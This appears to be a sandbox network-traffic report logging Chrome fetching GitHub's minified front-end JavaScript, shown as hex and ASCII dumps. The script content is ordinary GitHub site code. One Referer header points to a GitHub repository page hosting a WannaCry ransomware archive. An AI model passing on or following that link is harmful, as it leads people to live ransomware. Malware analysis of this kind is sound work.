                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 22 5d 2c 7b 35 35 35 35 37 3a 28 65 2c 73 2c 74 29 3d 3e 7b 76 61 72 20 5f 3d 74 28 37 36 30 30 36 29 3b 28 30 2c 5f 2e 6e 57 29 28 22 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 22 2c 28 29 3d 3e 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 74 2e 65 28 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 6f 6d 70 75 72 69 66 79 5f 64 69 73 74 5f 70 75 72 69 66 79 5f 6a 73 22 29 2c 74 2e 65 28 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["element-registry"],{55557:(e,s,t)=>{var _=t(76006);(0,_.nW)("animated-image",()=>Promise.all([t.e("vendors-node_modules_dompurify_dist_purify_js"),t.e("vendors-node_modules_stacktr
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 2d 39 34 61 34 38 62 22 29 2c 74 2e 65 28 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 69 6e 70 75 74 5f 74 73 22 29 2c 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 61 63 74 69 6f 6e 73 5f 61 63 74 69 6f 6e 73 2d 77 6f 72 6b 66 6c 6f 77 2d 66 69 6c 74 65 72 2d 65 6c 65 6d 65 6e 74 5f 74 73 2d 75 69 5f 70 61 63 6b 61 67 65 73 5f 66 65 61 74 75 72 65 2d 66 6c 61 67 73 5f 66 65 61 74 75 72 65 2d 66 2d 65 62 38 64 36 36 22 29 5d 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 33 39 39 38 30 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 61 63 74 69 6f 6e 73 2d 77 6f 72 6b 66 6c 6f 77 2d 6e 61 76 6c 69 73
                                                                                      Data Ascii: de_modules_delegated-events_di-94a48b"),t.e("app_assets_modules_github_filter-input_ts"),t.e("app_components_actions_actions-workflow-filter-element_ts-ui_packages_feature-flags_feature-f-eb8d66")]).then(t.bind(t,39980))),(0,_.nW)("actions-workflow-navlis
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 62 5f 73 65 6c 65 63 74 6f 72 2d 6f 62 73 65 72 76 65 72 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 22 29 2c 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 61 64 76 69 73 6f 72 69 65 73 5f 73 65 76 65 72 69 74 79 2d 73 65 6c 65 63 74 69 6f 6e 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 5d 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 37 34 30 33 36 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 73 65 76 65 72 69 74 79 2d 74 72 61 63 6b 69 6e 67 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 61 64 76 69 73 6f 72 69 65 73 5f 73 65 76 65 72 69 74 79 2d 74 72 61 63 6b 69 6e 67 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 34 35 35 34 33 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28
                                                                                      Data Ascii: b_selector-observer_dist_index_esm_js"),t.e("app_components_advisories_severity-selection-element_ts")]).then(t.bind(t,74036))),(0,_.nW)("severity-tracking",()=>t.e("app_components_advisories_severity-tracking-element_ts").then(t.bind(t,45543))),(0,_.nW)(
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 72 65 70 6f 2d 66 72 6f 6d 2d 73 65 6c 65 63 74 6f 72 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 33 33 38 35 35 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 73 65 6c 65 63 74 2d 61 6c 6c 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 62 75 73 69 6e 65 73 73 65 73 5f 70 65 6f 70 6c 65 5f 73 65 6c 65 63 74 2d 61 6c 6c 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 35 35 38 35 37 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 63 6c 6f 73 65 2d 72 65 61 73 6f 6e 2d 73 65 6c 65 63 74 6f 72 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 63 6c 6f 73 61 62 6c 65 73 5f 62 75 74 74 6f 6e 73 5f 63 6c 6f 73 65 2d 72 65 61 73 6f 6e 2d 73
                                                                                      Data Ascii: repo-from-selector-element_ts").then(t.bind(t,33855))),(0,_.nW)("select-all",()=>t.e("app_components_businesses_people_select-all-element_ts").then(t.bind(t,55857))),(0,_.nW)("close-reason-selector",()=>t.e("app_components_closables_buttons_close-reason-s
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 61 72 64 65 72 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 63 6f 64 65 73 70 61 63 65 73 5f 65 64 69 74 6f 72 2d 66 6f 72 77 61 72 64 65 72 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 37 35 37 31 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 63 6f 6d 6d 61 6e 64 2d 70 61 6c 65 74 74 65 2d 70 61 67 65 22 2c 28 29 3d 3e 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 74 2e 65 28 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 6f 6d 70 75 72 69 66 79 5f 64 69 73 74 5f 70 75 72 69 66 79 5f 6a 73 22 29 2c 74 2e 65 28 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63
                                                                                      Data Ascii: arder",()=>t.e("app_components_codespaces_editor-forwarder-element_ts").then(t.bind(t,7571))),(0,_.nW)("command-palette-page",()=>Promise.all([t.e("vendors-node_modules_dompurify_dist_purify_js"),t.e("vendors-node_modules_stacktrace-parser_dist_stack-trac
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 22 29 2c 74 2e 65 28 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 66 61 69 6c 62 6f 74 5f 66 61 69 6c 62 6f 74 5f 74 73 22 29 2c 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 63 6f 6e 64 75 69 74 5f 66 65 65 64 2d 70 6f 73 74 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 5d 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 37 30 38 37 35 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 63 6f 70 69 6c 6f 74 2d 73 69 67 6e 75 70 2d 63 68 6f 6f 73 65 2d 70 6c 61 6e 2d 74 79 70 65 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 63 6f 70 69 6c 6f 74 5f 63 6f 70 69 6c 6f 74 2d 73 69 67 6e 75 70 2d 63 68 6f 6f 73 65
                                                                                      Data Ascii: rser_esm_js-node_modules_github_bro-a4c183"),t.e("ui_packages_failbot_failbot_ts"),t.e("app_components_conduit_feed-post-element_ts")]).then(t.bind(t,70875))),(0,_.nW)("copilot-signup-choose-plan-type",()=>t.e("app_components_copilot_copilot-signup-choose
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 61 6c 65 72 74 2d 6c 6f 61 64 2d 61 6c 6c 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 31 33 35 31 34 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 64 65 70 65 6e 64 61 62 6f 74 2d 61 6c 65 72 74 2d 72 6f 77 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 64 65 70 65 6e 64 61 62 6f 74 5f 61 6c 65 72 74 73 5f 64 65 70 65 6e 64 61 62 6f 74 2d 61 6c 65 72 74 2d 72 6f 77 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 35 32 31 33 35 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 64 65 70 65 6e 64 61 62 6f 74 2d 61 6c 65 72 74 2d 74 61 62 6c 65 2d 68 65 61 64 65 72 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 64 65 70 65 6e 64 61 62
                                                                                      Data Ascii: alert-load-all-element_ts").then(t.bind(t,13514))),(0,_.nW)("dependabot-alert-row",()=>t.e("app_components_dependabot_alerts_dependabot-alert-row-element_ts").then(t.bind(t,52135))),(0,_.nW)("dependabot-alert-table-header",()=>t.e("app_components_dependab
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 22 29 2c 74 2e 65 28 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 66 61 69 6c 62 6f 74 5f 66 61 69 6c 62 6f 74 5f 74 73 22 29 2c 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 5d 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 34 30 35 32 34 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 64 69 61 6c 6f 67 2d 68 79 64 72 6f 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 68 79 64 72 6f
                                                                                      Data Ascii: tacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183"),t.e("ui_packages_failbot_failbot_ts"),t.e("app_components_github_remote-pagination-element_ts")]).then(t.bind(t,40524))),(0,_.nW)("dialog-hydro",()=>t.e("app_components_hydro
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 73 74 69 74 69 61 6c 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 31 30 32 36 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 6d 65 6d 65 78 2d 70 72 6f 6a 65 63 74 2d 70 69 63 6b 65 72 2d 75 6e 6c 69 6e 6b 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 6d 65 6d 65 78 5f 70 72 6f 6a 65 63 74 5f 6c 69 73 74 5f 6d 65 6d 65 78 2d 70 72 6f 6a 65 63 74 2d 70 69 63 6b 65 72 2d 75 6e 6c 69 6e 6b 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 36 34 38 32 32 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 70 72 6f 6a 65 63 74 2d 62 75 74 74 6f 6e 73 2d 6c 69 73 74 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 6d 65 6d 65 78 5f 70 72 6f 6a
                                                                                      Data Ascii: stitial-element_ts").then(t.bind(t,1026))),(0,_.nW)("memex-project-picker-unlink",()=>t.e("app_components_memex_project_list_memex-project-picker-unlink-element_ts").then(t.bind(t,64822))),(0,_.nW)("project-buttons-list",()=>t.e("app_components_memex_proj
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 70 61 63 65 73 5f 70 6f 6c 69 63 79 5f 66 6f 72 6d 5f 63 6f 6e 73 74 72 61 69 6e 74 5f 72 6f 77 5f 68 6f 73 74 2d 73 65 74 75 70 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 38 31 35 38 32 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 6d 61 78 2d 76 61 6c 75 65 22 2c 28 29 3d 3e 74 2e 65 28 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 5f 73 65 74 74 69 6e 67 73 5f 63 6f 64 65 73 70 61 63 65 73 5f 70 6f 6c 69 63 79 5f 66 6f 72 6d 5f 63 6f 6e 73 74 72 61 69 6e 74 5f 72 6f 77 5f 6d 61 78 2d 76 61 6c 75 65 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 38 36 30 39 38 29 29 29 2c 28 30 2c 5f 2e 6e 57 29 28 22 63 6f 64 65 73 70 61 63 65 73 2d 70 6f
                                                                                      Data Ascii: paces_policy_form_constraint_row_host-setup-element_ts").then(t.bind(t,81582))),(0,_.nW)("max-value",()=>t.e("app_components_organizations_settings_codespaces_policy_form_constraint_row_max-value-element_ts").then(t.bind(t,86098))),(0,_.nW)("codespaces-po


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.1649732185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC736OUTGET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-5a0e291a0298.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 13535
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 15 Mar 2024 22:47:25 GMT
                                                                                      ETag: 0x8DC4541E2C406EB
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 335908
                                                                                      X-Served-By: cache-iad-kcgs7200158-IAD, cache-lga21929-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 55, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 7e41efc9af559277dc8a0c24805dc4924e2b1888
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 69 6e 69 2d 74 68 72 6f 74 74 6c 65 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 61 6c 69 76 65 2d 63 6c 69 65 6e 74 5f 64 69 73 74 2d 62 66 35 61 61 32 22 5d 2c 7b 34 36 32 36 33 3a 28 65 2c 74 2c 73 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 3d 30 2c 7b 73 74 61 72 74 3a 73 3d 21 30 2c 6d 69 64 64 6c 65 3a 6e 3d 21 30 2c 6f 6e 63 65 3a 69 3d 21 31 7d 3d 7b 7d 29 7b 6c 65 74 20
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2"],{46263:(e,t,s)=>{function n(e,t=0,{start:s=!0,middle:n=!0,once:i=!1}={}){let
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 75 73 65 72 49 64 2c 74 68 69 73 2e 70 72 65 73 65 6e 63 65 49 64 29 2c 74 68 69 73 2e 73 6f 63 6b 65 74 3d 74 68 69 73 2e 63 6f 6e 6e 65 63 74 28 29 7d 73 75 62 73 63 72 69 62 65 28 65 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2e 61 64 64 28 2e 2e 2e 65 29 3b 66 6f 72 28 6c 65 74 20 73 20 6f 66 28 74 68 69 73 2e 73 65 6e 64 53 75 62 73 63 72 69 62 65 28 74 29 2c 65 29 29 7b 6c 65 74 20 65 3d 73 2e 74 6f 70 69 63 2e 6e 61 6d 65 3b 28 30 2c 69 2e 41 29 28 65 29 26 26 74 68 69 73 2e 6e 6f 74 69 66 79 43 61 63 68 65 64 50 72 65 73 65 6e 63 65 28 73 2e 73 75 62 73 63 72 69 62 65 72 2c 65 29 7d 7d 75 6e 73 75 62 73 63 72 69 62 65 28 65 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2e 64 65 6c
                                                                                      Data Ascii: userId,this.presenceId),this.socket=this.connect()}subscribe(e){let t=this.subscriptions.add(...e);for(let s of(this.sendSubscribe(t),e)){let e=s.topic.name;(0,i.A)(e)&&this.notifyCachedPresence(s.subscriber,e)}}unsubscribe(e){let t=this.subscriptions.del
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 73 63 6f 6e 6e 65 63 74 65 64 3d 21 31 2c 74 68 69 73 2e 63 6f 6e 6e 65 63 74 69 6f 6e 43 6f 75 6e 74 2b 2b 2c 74 68 69 73 2e 73 6f 63 6b 65 74 2e 75 72 6c 3d 74 68 69 73 2e 67 65 74 55 72 6c 57 69 74 68 50 72 65 73 65 6e 63 65 49 64 28 29 2c 74 68 69 73 2e 73 65 6e 64 53 75 62 73 63 72 69 62 65 28 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2e 74 6f 70 69 63 73 28 29 29 7d 73 6f 63 6b 65 74 44 69 64 43 6c 6f 73 65 28 65 2c 74 2c 73 29 7b 28 76 6f 69 64 20 30 21 3d 3d 74 68 69 73 2e 72 65 64 65 70 6c 6f 79 45 61 72 6c 79 52 65 63 6f 6e 6e 65 63 74 54 69 6d 65 6f 75 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 72 65 64 65 70 6c 6f 79 45 61 72 6c 79 52 65 63 6f 6e 6e 65 63 74 54 69 6d 65 6f 75 74 29 2c 22 41 6c 69 76 65 20 52 65
                                                                                      Data Ascii: sconnected=!1,this.connectionCount++,this.socket.url=this.getUrlWithPresenceId(),this.sendSubscribe(this.subscriptions.topics())}socketDidClose(e,t,s){(void 0!==this.redeployEarlyReconnectTimeout&&clearTimeout(this.redeployEarlyReconnectTimeout),"Alive Re
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 2c 61 29 7d 7d 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2e 73 75 62 73 63 72 69 62 65 72 73 28 65 29 29 7b 6c 65 74 20 72 3d 74 68 69 73 2e 75 73 65 72 49 64 2c 61 3d 41 72 72 61 79 2e 66 72 6f 6d 28 69 2e 76 61 6c 75 65 73 28 29 29 2e 66 69 6c 74 65 72 28 65 3d 3e 65 2e 75 73 65 72 49 64 21 3d 3d 72 29 2c 6f 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 3d 28 73 3d 69 2e 67 65 74 28 74 68 69 73 2e 75 73 65 72 49 64 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 6d 65 74 61 64 61 74 61 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 5b 5d 2c 6c 3d 74 68 69 73 2e 70 72 65 73 65 6e 63 65 4d 65 74 61 64 61 74 61 2e 67 65 74 43 68 61 6e 6e 65 6c 4d 65 74 61 64 61 74 61 28 65 2c
                                                                                      Data Ascii: ,a)}}for(let t of this.subscriptions.subscribers(e)){let r=this.userId,a=Array.from(i.values()).filter(e=>e.userId!==r),o=null!==(n=null===(s=i.get(this.userId))||void 0===s?void 0:s.metadata)&&void 0!==n?n:[],l=this.presenceMetadata.getChannelMetadata(e,
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 75 62 73 63 72 69 62 65 3a 65 7d 29 29 3b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 65 29 28 30 2c 69 2e 41 29 28 74 2e 6e 61 6d 65 29 26 26 74 68 69 73 2e 70 72 65 73 65 6e 63 65 2e 63 6c 65 61 72 43 68 61 6e 6e 65 6c 28 74 2e 6e 61 6d 65 29 7d 7d 7d 2c 32 39 38 37 31 3a 28 65 2c 74 2c 73 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 2c 73 29 3d 3e 7b 6c 65 74 20 6e 3d 45 72 72 6f 72 28 22 61 62 6f 72 74 65 64 22 29 3b 6e 2e 6e 61 6d 65 3d 22 41 62 6f 72 74 45 72 72 6f 72 22 2c 65 2e 61 62 6f 72 74 65 64 3f 73 28 6e 29 3a 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 28 29 3d 3e 73 28 6e 29 29 7d 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 69 28
                                                                                      Data Ascii: ubscribe:e}));for(let t of e)(0,i.A)(t.name)&&this.presence.clearChannel(t.name)}}},29871:(e,t,s)=>{function n(e){return new Promise((t,s)=>{let n=Error("aborted");n.name="AbortError",e.aborted?s(n):e.addEventListener("abort",()=>s(n))})}async function i(
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6c 65 74 20 65 3b 6c 65 74 20 74 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 73 20 6f 66 20 74 68 69 73 2e 73 75 62 73 63 72 69 62 65 72 4d 65 74 61 64 61 74 61 2e 76 61 6c 75 65 73 28 29 29 66 6f 72 28 6c 65 74 20 69 20 6f 66 20 73 29 69 66 28 6e 20 69 6e 20 69 29 7b 6c 65 74 20 74 3d 21 21 69 5b 6e 5d 3b 65 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 74 3a 74 26 26 65 7d 65 6c 73 65 20 74 2e 70 75 73 68 28 69 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 65 26 26 74 2e 70 75 73 68 28 7b 5b 6e 5d 3a 65 3f 31 3a 30 7d 29 2c 74 7d 6c 65 74 20 74 3d 5b 5d 2c 7b 73 75 62 73 63 72 69 62 65 72 3a 73 2c 6d 61 72 6b 41 6c 6c 41 73 4c 6f 63 61 6c 3a 72 7d 3d 65 3b 66 6f 72 28 6c 65 74 5b 65 2c 6e 5d 6f 66 20 74 68 69 73 2e 73 75 62 73 63 72 69 62 65 72 4d 65 74 61 64 61
                                                                                      Data Ascii: let e;let t=[];for(let s of this.subscriberMetadata.values())for(let i of s)if(n in i){let t=!!i[n];e=void 0===e?t:t&&e}else t.push(i);return void 0!==e&&t.push({[n]:e?1:0}),t}let t=[],{subscriber:s,markAllAsLocal:r}=e;for(let[e,n]of this.subscriberMetada
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 63 74 69 6f 6e 43 6f 75 6e 74 7d 61 64 64 50 72 65 73 65 6e 63 65 49 74 65 6d 28 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 55 73 65 50 72 65 73 65 6e 63 65 49 74 65 6d 28 65 29 26 26 74 68 69 73 2e 70 72 65 73 65 6e 63 65 49 74 65 6d 73 2e 73 65 74 28 65 2e 70 72 65 73 65 6e 63 65 4b 65 79 2c 65 29 7d 72 65 6d 6f 76 65 50 72 65 73 65 6e 63 65 49 74 65 6d 28 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 55 73 65 50 72 65 73 65 6e 63 65 49 74 65 6d 28 65 29 26 26 74 68 69 73 2e 70 72 65 73 65 6e 63 65 49 74 65 6d 73 2e 64 65 6c 65 74 65 28 65 2e 70 72 65 73 65 6e 63 65 4b 65 79 29 7d 72 65 70 6c 61 63 65 50 72 65 73 65 6e 63 65 49 74 65 6d 73 28 65 29 7b 66 6f 72 28 6c 65 74 20 74 20 6f 66 28 74 68 69 73 2e 70 72 65 73 65 6e 63 65 49 74 65 6d 73 2e 63 6c 65 61
                                                                                      Data Ascii: ctionCount}addPresenceItem(e){this.shouldUsePresenceItem(e)&&this.presenceItems.set(e.presenceKey,e)}removePresenceItem(e){this.shouldUsePresenceItem(e)&&this.presenceItems.delete(e.presenceKey)}replacePresenceItems(e){for(let t of(this.presenceItems.clea
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 65 29 26 26 28 74 2e 70 75 73 68 28 6e 29 2c 74 68 69 73 2e 73 69 67 6e 61 74 75 72 65 73 2e 64 65 6c 65 74 65 28 6e 2e 6e 61 6d 65 29 29 7d 72 65 74 75 72 6e 20 74 7d 64 72 61 69 6e 28 2e 2e 2e 65 29 7b 6c 65 74 20 74 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 73 20 6f 66 20 65 29 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2e 64 72 61 69 6e 28 73 29 29 7b 6c 65 74 20 73 3d 74 68 69 73 2e 73 69 67 6e 61 74 75 72 65 73 2e 67 65 74 28 65 29 3b 74 68 69 73 2e 73 69 67 6e 61 74 75 72 65 73 2e 64 65 6c 65 74 65 28 65 29 2c 74 2e 70 75 73 68 28 73 29 7d 72 65 74 75 72 6e 20 74 7d 74 6f 70 69 63 73 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 6e 61 74 75 72 65 73 2e 76 61 6c 75 65 73 28 29 7d 74 6f 70 69 63 28
                                                                                      Data Ascii: e)&&(t.push(n),this.signatures.delete(n.name))}return t}drain(...e){let t=[];for(let s of e)for(let e of this.subscriptions.drain(s)){let s=this.signatures.get(e);this.signatures.delete(e),t.push(s)}return t}topics(){return this.signatures.values()}topic(
